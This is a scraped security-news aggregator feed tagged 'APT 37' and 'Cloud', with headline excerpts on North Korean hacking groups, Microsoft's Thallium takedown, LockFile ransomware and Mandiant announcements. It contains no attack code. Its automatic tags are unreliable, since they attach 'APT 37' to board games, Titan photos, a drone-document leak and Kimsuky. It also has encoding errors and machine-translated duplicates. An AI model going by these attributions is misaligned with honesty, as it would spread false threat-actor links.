Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken as the patches will not remove planted webshells in their environments. A threat intelligence platform (TIP) such as Anomali Threatstream can be a valuable tool to assist organizations ingesting current indicators of compromise (IOCs) and determine whether their Exchange instances have been compromised.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Web Shell - T1100 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Source - T1153
Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor
LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers
(published: August 20, 2021)
A new ransomware family, named Lockfile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs) which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several |
Ransomware Malware Tool Vulnerability Threat Patching Cloud | APT 37 | |
|
2021-08-19 06:47:34 | NK-linked InkySquid APT leverages IE exploits in recent attacks (lien direct) | North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper. Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group (aka ScarCruft, APT37, Group123, and Reaper) leverages two Internet Explorer exploits to deliver a custom backdoor in watering hole attacks aimed at the […] | Cloud | APT 37 | |
|
2021-08-18 01:33:33 | NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware (lien direct) | A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.
Cybersecurity firm Volexity attributed the attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the |
Malware Threat Cloud | APT 37 | |
|
2021-08-10 03:38:14 | Une mise à jour intrigante de l'avantage mandiant An Intriguing Update to Mandiant Advantage (lien direct) |
Aujourd'hui, Mandiant a fait une annonce significative dans la promotion des capacités de la plate-forme SaaS de mandiant avantage avec l'acquisition d'unEmerging Attack Surface Management (ASM) Leader, intrigue.Avec cette acquisition, nous nous réjouissons également de Jonathan Cran et de l'équipe d'intrigue auprès de la famille Mandiant.Nous sommes très heureux que Jonathan, un visionnaire et entrepreneur connu de l'industrie, se joigne à Maniant alors que nous continuons à développer nos capacités d'avantage.
ASM émerge rapidement, conduisant la valeur grâce à la visibilité des actifs et de l'exposition dans la surface d'attaque destinée à Internet.Il comble une lacune entre l'actif
Today Mandiant made a significant announcement in furthering the capabilities of the Mandiant Advantage SaaS platform with the acquisition of an emerging Attack Surface Management (ASM) leader, Intrigue. With this acquisition we also welcome Jonathan Cran and the Intrigue team to the Mandiant family. We are very excited to have Jonathan, a known industry visionary and entrepreneur, join Mandiant as we continue to build out our Advantage capabilities. ASM is quickly emerging, driving value through asset and exposure visibility in internet-facing attack surface. It fills a gap between asset |
Cloud | ★★★★ | |
|
2021-06-02 10:00:00 | Un nouvel avenir pour Fireeye et Mandiant: Accélération des opportunités A New Future for FireEye and Mandiant: Accelerating Opportunities (lien direct) |
avec ANNONCE D'AUJOURD'HUI De la vente de l'entreprise FireEye Products To Symphony Technology Group (STG), nous avons fait un pas en avant important pour nous aider à mieux servir nos clients et accélérer les stratégies qui sontDéfinir l'avenir de la cybersécurité.
La transaction séparera les produits de sécurité de Fireeye \\, des e-mails, des points de terminaison et des produits de sécurité cloud, ainsi que la plate-forme de gestion et d'orchestration de la sécurité connexe à partir de logiciels et services d'agnostiques mandiant solutions \\ '.Le résultat: les deux organisations seront en mesure d'accélérer les investissements en croissance, de poursuivre de nouvelles voies de mise sur le marché et
With today\'s announcement of the sale of the FireEye Products business to Symphony Technology Group (STG), we have taken an important step forward to help us better serve our customers and accelerate strategies that are defining the future of cyber security. The transaction will separate FireEye\'s network, email, endpoint, and cloud security products, and related security management and orchestration platform from Mandiant Solutions\' controls-agnostic software and services. The result: both organizations will be able to accelerate growth investments, pursue new go-to-market pathways, and |
Cloud | ★★★ | |
 |
2021-02-11 11:00:00 | UN Links North Korea to $281m Crypto Exchange Heist (lien direct) | Most funds recovered but attack bears hallmarks of hermit kingdom | Cloud | APT 37 | |
|
2021-01-08 01:54:44 | ALERT: North Korean hackers targeting South Korea with RokRat Trojan (lien direct) | A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government.
Attributing the attack to APT37 (aka Starcruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT).
"The |
Tool Cloud | APT 37 | |
 |
2021-01-06 15:14:45 | Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat (lien direct) |
A North Korean threat group has swapped the usual Hangul Office lures for a cleverly packed Office macro.
Categories: Social engineeringThreat analysis
Tags: APT37HangulkoreaOfficerokratVBA
(Read more...)
|
Threat Cloud | APT 37 | |
|
2021-01-05 11:55:57 | North Korean software supply chain attack targets stock investors (lien direct) | North Korean hacking group Thallium aka APT37 has been targeting a private stock investment messenger service in a supply chain attack, as reported this week. [...] | Cloud | APT 37 | |
|
2020-11-17 00:00:00 | CRIMZONâ¢: The Data Behind the FrameworkA report that highlights a subset of the empirical validation for the CRIMZON⢠framework.Read More (lien direct) | âAbstract The CRIMZON⢠framework defines the minimal elements needed to provide a view of accumulated cyber risk. For natural catastrophe risk, individual policy exposures can be aggregated within geographic zones.Similarly, cyber exposures can be aggregated using CRIMZONâ¢. Location also holds importance when assessing cyber catastrophe risk, however, two additional elements must be taken into account to properly assess cyber risk accumulation: industry and company size. Insured companies with common characteristics related to location, industry, and entity size tend to be exposed to similar types of cyber events because these elements also correspond to technologies or service providers used. Based on an analysis of millions of cyber events in the last 20 years, Kovrr conducted extensive research, to serve as the core empirical validation for the CRIMZON framework. Below is a subset of the research, in which a study group of 120 CRIMZON was determined by selecting CRIMZON with the highest relevance to the cyber insurance market(he research group was compiled according to criteria detailed in (Appendix A) The total number of unique companies in the study group is 20,000, with an average number of 152 companies within a CRIMZON, and a median of 86 companies. The research criteria focused on companiesâ location industry, entity size, and the hosting and mail technology and service providers used by companies. The results showed a concentration of technologies and services when grouping by location, and further concentration when adding the additional elements of the CRIMZON, entity size and industry to the analysis. The research shows that companies within the same CRIMZON have the tendency to use the same service providers and technologies, and that different compositions of service providers and technologies can be found across CRIMZON. When trying to estimate accumulations of potential losses from cyber, insurance and reinsurance companies face two main challenges: identifying which policies are exposed to the same cyber events and determining how many policies will be affected at the same time. The former is related to the problem of enumerating all technologies and service providers each insured relies upon, the latter is equivalent to estimating the footprint of a cyber event. Analyzing accumulations by CRIMZON enables risk professionals to make sense of the size and extent of potential losses from cyber, without necessarily needing to collect detailed information about technologies and service providers for each insured. The framework is completely agnostic to the line of business, therefore unlocking a full range of possible applications across both silent and affirmative cyber coverages. Among these applications is the development of aggregate models. This research shows it is possible to estimate the two key ingredients needed for the development of industry loss curves, the hazard and the exposure, using the CRIMZON as the atomic unit of aggregation. By identifying the correlation across CRIMZON, an aggregate model can then be developed.âIntroduction - What are CRIMZONâ¢? The Cyber Risk Accumulation Zones (CRIMZONâ¢) framework defines the minimal elements needed to provide a view of aggregated cyber exposure. Kovrr launched CRIMZON during participation in the fourth cohort of the Lloydâs Lab, the insurance technology accelerator operated by Lloydâs of London. CRIMZON is an open framework created to facilitate better communication across players in the cyber insurance value chain. The framework allows users to overlay their data pertaining to loss, cyber attack frequency, as well as additional data onto the CRIMZON for additional insights of risk per zone and to detect correlations between different zones. The framework was created to support efforts for setting a standard for data collection for cyber risk management.The CRIMZON are composed of the following three elements:Location - country-level worldwide a | Vulnerability Studies Cloud | ★★★ | |
|
2020-11-03 03:49:37 | New Kimsuky Module Makes North Korean Spyware More Powerful (lien direct) | A week after the US government issued an advisory about a "global intelligence gathering mission" operated by North Korean state-sponsored hackers, new findings have emerged about the threat group's spyware capabilities.
The APT - dubbed "Kimsuky" (aka Black Banshee or Thallium) and believed to be active as early as 2012 - has been now linked to as many as three hitherto undocumented malware, |
Threat Cloud | APT 37 | |
|
2020-11-02 16:40:03 | North Korea-Linked APT Group Kimsuky spotted using new malware (lien direct) | North Korea-linked APT group Kimsuky was recently spotted using a new piece of malware in attacks on government agencies and human rights activists. North Korea-linked cyber espionage group Kimsuky (aka Black Banshee, Thallium, Velvet Chollima) was recently observed using a new malware in attacks aimed at government agencies and human rights activists. The Kimsuky APT […] | Malware Cloud | APT 37 | |
|
2020-09-15 11:22:27 | De nouvelles vulnérabilités permettent de contourner l\'authentification multifacteur de Microsoft 365 (lien direct) | L'authentification multifacteur (MFA) est rapidement devenue une sécurité indispensable pour les applications cloud pendant la pandémie mondiale de Covid-19. Avec l'accélération du télétravail, la demande d'applications basées sur le cloud, telles que les plateformes de messagerie et de collaboration a explosé. The post De nouvelles vulnérabilités permettent de contourner l'authentification multifacteur de Microsoft 365 first appeared on UnderNews. | Cloud | ||
 |
2020-08-18 04:35:04 | US Army report says many North Korean hackers operate from abroad (lien direct) | US Army says many North Korean hackers are actually located outside the hermit kingdom, in countries like Belarus, China, India, Malaysia, and Russia. | Cloud | APT 37 | |
|
2020-07-30 14:00:00 | Obscurci par les nuages: aperçu des attaques du bureau 365 et comment la défense gérée mandiante enquête Obscured by Clouds: Insights into Office 365 Attacks and How Mandiant Managed Defense Investigates (lien direct) |
Avec les compromis par e-mail commerciaux (BECS) ne montrant aucun signe de ralentissement Comprendre les violations du bureau 365 (O365) et comment les enquêter correctement.Ce billet de blog est destiné à ceux qui n'ont pas encore plongé les orteils dans les eaux d'un O365 BEC, fournissant un cours intensif sur la suite de productivité cloud de Microsoft et son assortiment de journaux et de sources de données utiles aux enquêteurs.Nous allons également passer en revue les tactiques d'attaquant courantes que nous avons observées en répondant aux BEC et fournissant un aperçu de la façon dont les analystes de défense gérés mandiants abordent ces
With Business Email Compromises (BECs) showing no signs of slowing down, it is becoming increasingly important for security analysts to understand Office 365 (O365) breaches and how to properly investigate them. This blog post is for those who have yet to dip their toes into the waters of an O365 BEC, providing a crash course on Microsoft\'s cloud productivity suite and its assortment of logs and data sources useful to investigators. We\'ll also go over common attacker tactics we\'ve observed while responding to BECs and provide insight into how Mandiant Managed Defense analysts approach these |
Cloud | ★★★★ | |
 |
2020-04-29 14:00:00 | 6 Best Board Games You Can Play With Friends Over Zoom (Video Chat) (lien direct) | Don't let the Covid-19 quarantine turn you into a hermit. Video chat with some friends and play a game together. | Cloud | APT 37 | |
 |
2020-01-03 10:40:14 | Microsoft helps shutter domains run by North Korean cybergang Thallium (lien direct) | A U.S. district court issued an order enabling Microsoft to take over 50 domains used by a North Korea-based cybercrime gang to conduct spear phishing campaigns. Microsoft's Digital Crimes Unit and the Microsoft Threat Intelligence Center took down the domains controlled by a group it named Thallium after researching the malicious actors activity and filing […] | Threat Cloud | APT 37 | |
 |
2019-12-31 02:39:43 | Microsoft élimine 50 noms de domaine exploités par de redoutables hackers nord-coréens (lien direct) | Le groupe Thallium s'en servait pour infiltrer des institutions américaines, japonaises et sud-coréennes. Pour y parvenir, Microsoft a reçu une ordonnance des autorités américaines.  |
Cloud | APT 37 | |
|
2019-12-30 21:57:04 | Microsoft sued North Korea-linked Thallium group (lien direct) | Microsoft sued Thallium North Korea-linked APT for hacking into its customers’ accounts and networks via spear-phishing attacks. Microsoft sued a North Korea-linked cyber espionage group tracked as Thallium for hacking into its customers’ accounts and networks via spear-phishing attacks. The hackers target Microsoft users impersonating the company, according to a lawsuit unsealed Dec. 27 in […] | Cloud | APT 37 | |
|
2019-12-30 21:53:41 | Microsoft takes down 50 domains operated by North Korean hackers (lien direct) | Microsoft takes control of 50 domains operated by Thallium (APT37), a North Korean cyber-espionage group. | Cloud | APT 37 | |
|
2019-12-30 13:01:33 | Microsoft Takes North Korean Hacking Group Thallium to Court (lien direct) | Microsoft sued a cyber-espionage group with North Korean links tracked as Thallium for breaking into its customers' accounts and networks via spear-phishing attacks with the end goal of stealing sensitive information, as shown by a complaint unsealed on December 27. [...] | Cloud | APT 37 | |
|
2019-05-14 12:48:00 | North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal (lien direct) | The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. ScarCruft has been active since at least 2012, it made the headlines in early February […] | Cloud | APT 37 | |
|
2019-05-13 15:29:00 | North Korea-Linked \'ScarCruft\' Adds Bluetooth Harvester to Toolkit (lien direct) | A North Korea-linked threat group tracked as ScarCruft, APT37 and Group123 continues to evolve and expand its toolkit, Kaspersky Lab reported on Monday. | Threat Cloud | APT 37 | |
|
2018-10-01 11:00:00 | Report Ties North Korean Attacks to New Malware, Linked by Word Macros (lien direct) | Newly discovered malware from the world of cyberespionage connects the dots between the tools and operations of the little-known Reaper group believed to act on behalf of the North Korean government. [...] | Malware Cloud | APT 37 | |
 |
2018-08-15 12:30:04 | July\'s Most Wanted Malware: Attacks Targeting IoT and Networking doubled since May 2018 (lien direct) | Three IoT vulnerabilities entered July's top ten most exploited vulnerabilities list, as threat actors have doubled their attacks on these Mirai and Reaper-related vulnerabilities since May 2018. During July 2018, three IoT vulnerabilities entered the Top 10 most exploited list: MVPower DVR router Remote Code Execution at #5; D_Link DSL-2750B router Remote Command Execution… | Threat Cloud | APT 37 | |
|
2018-08-10 16:15:03 | The analysis of the code reuse revealed many links between North Korea malware (lien direct) | Security researchers at Intezer and McAfee have conducted a joint investigation that allowed them to collect evidence that links malware families attributed to North Korean APT groups such as the notorious Lazarus Group and Group 123. The experts focused their analysis on the code reuse, past investigations revealed that some APT groups share portions of code […] | Malware Medical Cloud | APT 38 APT 37 | |
 |
2018-08-09 13:00:01 | Examining Code Reuse Reveals Undiscovered Links Among North Korea\'s Malware Families (lien direct) | 
This research is a joint effort by Jay Rosenberg, senior security researcher at Intezer, and Christiaan Beek, lead scientist and senior principal engineer at McAfee. Intezer has also posted this story. Attacks from the online groups Lazarus, Silent Chollima, Group 123, Hidden Cobra, DarkSeoul, Blockbuster, Operation Troy, and 10 Days of Rain are believed to …
|
Malware Guideline Medical Cloud | APT 38 APT 37 | |
|
2018-07-21 12:00:00 | Space Photos of the Week: Sweeping the Clouds Away on Titan (lien direct) | With infrared eyes, astronomers are more than scratching the surface of Saturn's hazy moon. | Cloud | APT 37 | |
 |
2018-07-12 14:35:00 | Military documents about MQ-9 Reaper drone leaked on dark web (lien direct) | Hackers have put up for sale on the dark web sensitive military documents, some associated with the U.S. military’s MQ-9 Reaper drone aircraft, one of its most lethal and technologically advanced drones, security research firm Recorded Future recently discovered. The firms’ Insikt Group on June 1 observed a bad actor trying to sell...Read the whole entry... _!fbztxtlnk!_ https://feeds.feedblitz.com/~/557965066/0/thesecurityledger -->» | Cloud | APT 37 |
To see everything:
Our RSS (filtrered)
